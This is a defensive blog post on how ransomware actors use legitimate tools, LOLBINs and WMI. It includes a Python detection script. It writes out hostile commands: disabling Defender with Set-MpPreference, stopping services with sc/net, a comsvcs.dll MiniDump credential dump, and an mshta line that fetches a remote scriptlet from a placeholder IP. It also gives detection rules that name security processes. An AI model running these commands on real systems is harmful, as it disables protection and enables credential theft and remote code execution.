Ransomware actors have increasingly shifted their tactics, techniques, and procedures (TTPs) to include the use of legitimate commercial and open-source software rather than relying solely on their custom-built webshells or malware. This shift is often referred to as "Bring Your Own Tools" (BYOT), where threat actors use trusted and widely available tools for malicious purposes.
Ransomware Actors' Arsenal: From Webshells to Commercial Tools
Ransomware actors are now using a variety of free, commercial, and open-source software in their attacks. Some of the most commonly used tools include:
BloodHound: A tool that identifies and exploits misconfigurations in Active Directory environments.
WinSCP: A popular free SFTP, FTP, WebDAV, and SCP client.
PoshC2: A command and control framework that is often used for post-exploitation.
Cobalt Strike: A commercial adversary simulation tool used to emulate advanced threats.
Brute Ratel: A red-teaming tool designed to evade detection by EDR and AV solutions.
AdFind: An LDAP query tool used to gather information from Active Directory.
These tools are often utilized by ransomware operators to move laterally, gather intelligence, and escalate privileges within a compromised environment.
The Darknet Marketplace: Where Exploits and Tools Are Sold
If you explore darknet forums, you’ll find that commercial tools like CANVAS, Cobalt Strike, and Core Impact are often available for sale. These tools, originally developed for legitimate purposes such as penetration testing, are being weaponized by ransomware groups to compromise networks.
Example of a Darknet Forum Selling Exploits
BYOT: Bring Your Own Tools
The BYOT approach is now a staple in ransomware campaigns. By utilizing cloud-based file-sharing sites like Google Drive, Dropbox, and Box, threat actors can easily bring these tools into a target environment without raising suspicion. It’s crucial for organizations to block and alert on these domains to prevent such tactics.
Monitoring & Alerting Domains/URLs:
Commonly Accessed GitHub Repositories:
Living Off Trusted Sites (LOTS) Project:
mrd0x maintains the Living Off Trusted Sites (LOTS) Project, cataloging sites used frequently for BYOT, data exfiltration, phishing, and other malicious activities. It’s essential to monitor and alert on such domains to prevent and detect these activities.
Bypassing Security Software
Once attackers gain initial access, they often need to disable security mechanisms to execute their payloads. Disabling real-time monitoring in Windows Defender, for instance, can be done easily if the attacker has admin privileges:
Set-MpPreference -DisableRealtimeMonitoring $True
Unfortunately, many organizations do not monitor for invocations of Set-MpPreference. With the ease of disabling Defender's real-time monitoring, it becomes clear why having a robust backup solution is critical.
Common Bypass Tools & Techniques:
GMER, Hitman Pro, PC Hunter, Process Hacker: Tools used to disable security mechanisms. Process Hacker, for example, can identify and disable security product services, loaded libraries, and more.
BYOVD (Bring Your Own Vulnerable Driver): This involves bringing a legitimately signed but vulnerable kernel driver into the environment and exploiting it to gain kernel-level access, which is then used to disable security mechanisms such as AV, EPP, and EDR services.
Common Drivers Used in Ransomware Attacks:
aswArPot.sys (Avast)
gdrv.sys (Gigabyte)
mhyprot2.sys (Genshin Impact)
DLL Hijacking: Wietze Beukema's Hijack Libs project offers an overview of DLL Hijacking, where legitimate DLLs are replaced or hijacked by malicious actors.
LOLBAS commands:
Rather than using a dedicated tool to find and kill security product services and processes, the LOLBAS commands sc, net, and taskkill can do the job:
Service Identification and Termination:
sc Command:
Example: sc stop [service_name] can be used to stop a specific service.
net Command:
Example: net stop [service_name] will halt the identified service.
Process Identification and Termination:
Task Manager and tasklist Command:
Once a process is identified, taskkill can be used to stop it.
PowerShell Cmdlets:
Get-Service/Stop-Service: These cmdlets allow administrators (and attackers) to query and stop services, respectively.
Get-Process/Stop-Process: These cmdlets are used to query and terminate running processes.
LOLBINs & Native Execution Methods
Ransomware actors often use legitimate binaries, also known as LOLBINs (Living Off the Land Binaries), to execute malicious commands:
regsvr32: Registers DLLs.
rundll32: Executes functions directly from DLLs.
bitsadmin: Administers the Background Intelligent Transfer Service (BITS).
msbuild: CLI compiler for Visual Studio.
msiexec: Windows Installer for installing programs and tools.
mshta: Executes HTML Applications (HTA) code.
winrs and wmic: Used for remote command execution.
wsl: Windows Subsystem for Linux, abused for execution and persistence.
Example Commands:
1. cmd.exe /k [malicious command]
2. powershell.exe -c rundll32.exe C:\Windows\System32\comsvcs.dll,MiniDump 4242 C:\WINDOWS\TEMP full
3. regsvr32 c:\users\public\legit.dll
4. mshta.exe vbscript:Close(Execute("GetObject("script:http://1.1.1.1/not_malicious.sct")"))
Windows Management Instrumentation (WMI)
WMI has been around for many years and is commonly used by ransomware actors for persistence and lateral movement. Below are the key components and methods associated with WMI in ransomware cases:
Key WMI Components:
wmic.exe: General CLI tool to interact with WMI.
wmiprvse.exe: WMI Provider Host, the service process that handles WMI requests; often seen in remote WMI activity.
wsmprovhost.exe: Runs on the remote host if PSRemoting is used.
mofcomp.exe: MOF (Managed Object Format) compiler used to insert data into the WMI repository.
WMI Commands:
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
WMI is often used by ransomware actors to launch processes with "Medium" integrity. Some malware calls itself using WMIC via process call create [bad_stuff_here] to elevate privileges on the system.
Detecting WMIC Execution: To detect WMI-based attacks, monitor processes launched by WMIC with medium integrity and unusual invocations.
For detailed WMI analysis, collect the WMI database files located at %SystemRoot%\System32\Wbem\Repository\.
Enable WMI Tracing:
Wevtutil.exe sl Microsoft-Windows-WMI-Activity/Trace /e:true
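The detection points raised above (unmonitored Set-MpPreference invocations, sc/net/taskkill and the Stop-Service/Stop-Process cmdlets aimed at security products, the rundll32 comsvcs.dll MiniDump LOLBIN example, and processes launched through WMIC or spawned by WmiPrvSE.exe) can be expressed as a small set of rules over process-creation telemetry. The following is an added example, not code from the original post; it assumes Sysmon-style event fields (Image, ParentImage, CommandLine), and the service/process watchlists and sample events are constructed here, not taken from real telemetry.

```python
import re
from pathlib import PureWindowsPath

# Constructed watchlists (assumptions): extend with the service/process names of your own AV/EDR.
SECURITY_SERVICES = {"windefend", "sense", "wdnissvc", "mpssvc"}
SECURITY_PROCESSES = {"msmpeng", "nissrv", "mssense"}
SHELLS = {"cmd", "powershell", "pwsh", "rundll32", "regsvr32", "mshta"}

def _base(path):  # C:\Windows\System32\sc.exe -> "sc"
    return PureWindowsPath(path).name.lower().removesuffix(".exe")

def _tokens(cmdline):  # lower-cased, unquoted argv-style tokens with any .exe suffix dropped
    return {t.strip("\"'").lower().removesuffix(".exe") for t in cmdline.split()}

def classify(event):
    """Return the names of every rule a Sysmon-style process-creation event matches."""
    image, parent = _base(event["Image"]), _base(event.get("ParentImage", ""))
    cmd, tokens = event["CommandLine"].lower(), _tokens(event["CommandLine"])
    hits = []
    if re.search(r"set-mppreference.*-disable\w*\s+\$?true\b", cmd):
        hits.append("defender_tampering")      # Set-MpPreference -Disable... $True
    stops = (image in {"sc", "net", "net1"} and "stop" in tokens) or "stop-service" in cmd
    if stops and tokens & SECURITY_SERVICES:
        hits.append("security_service_stop")   # sc stop / net stop / Stop-Service on AV services
    if (image == "taskkill" or "stop-process" in cmd) and tokens & SECURITY_PROCESSES:
        hits.append("security_process_kill")   # taskkill / Stop-Process on AV processes
    if image == "wmic" and re.search(r"process\s+call\s+create", cmd):
        hits.append("wmic_process_create")     # wmic process call create ...
    if parent == "wmiprvse" and image in SHELLS:
        hits.append("wmi_spawned_shell")       # remote WMI execution: WmiPrvSE.exe -> shell
    if image == "rundll32" and "comsvcs.dll" in cmd and "minidump" in cmd:
        hits.append("comsvcs_minidump")        # rundll32 comsvcs.dll,MiniDump (process memory dump)
    return hits

def scan(events):
    """Map each suspicious CommandLine to its rule hits; events matching no rule are dropped."""
    return {e["CommandLine"]: h for e in events if (h := classify(e))}

# Constructed sample events (not real telemetry); the last two are benign admin activity.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -c Set-MpPreference -DisableRealtimeMonitoring $True"},
    {"Image": r"C:\Windows\System32\sc.exe", "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "sc stop WinDefend"},
    {"Image": r"C:\Windows\System32\taskkill.exe", "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "taskkill /F /IM MsMpEng.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "CommandLine": "cmd.exe /c whoami"},
    {"Image": r"C:\Windows\System32\net.exe", "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": r"net use Z: \\fileserver\share"},
    {"Image": r"C:\Windows\System32\sc.exe", "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "sc query Spooler"},
]
```

Running scan(SAMPLE_EVENTS) flags the first four events and drops the two benign ones; in production the watchlists should be tuned to the vendor products in use and the wmi_spawned_shell rule baselined against legitimate management tooling that also executes through WmiPrvSE.exe.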
WMI Course: A Deep Dive
I’ve created an in-depth course on WMI, covering its capabilities, stealthy persistence techniques, and how to detect and defend against WMI-based attacks. Check out the full course below:
Akash Patel